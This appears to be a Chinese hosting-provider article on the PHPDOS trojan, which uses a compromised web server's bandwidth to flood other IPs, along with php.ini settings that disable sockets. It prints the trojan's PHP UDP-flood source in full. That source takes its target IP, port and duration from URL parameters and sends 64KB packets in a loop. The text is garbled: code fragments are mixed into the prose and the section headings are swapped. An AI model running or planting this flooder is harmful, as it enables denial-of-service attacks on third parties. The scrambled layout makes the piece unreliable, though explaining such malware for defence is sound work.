有的客户在使用服务器的过程中,突然发现服务器无法访问,然后联系我们网盾的客服人员,发现系统很正常,但是带宽却是满载,一般遇到这个对外发包的情况就有可能是服务器里网站里存在有PHPDOS木马,黑客通过在IIS里运行PHPDOS的木马,用PHP代码调用sockets,直接用服务器的网络攻击别的IP,并且耗费服务器本机带宽 。 一般PHPdos木马代码如下: $exec_time = $_GET[\'time\']; $time = time(); \"; $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包. 解决办法:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
print \"Flooded: $ip on port $rand
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
表现特征:
在php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启IIS。
在做好以上设置后,多检查自己的程序有没有新补丁没有升级之类的,防止黑客入侵上传类似的木马。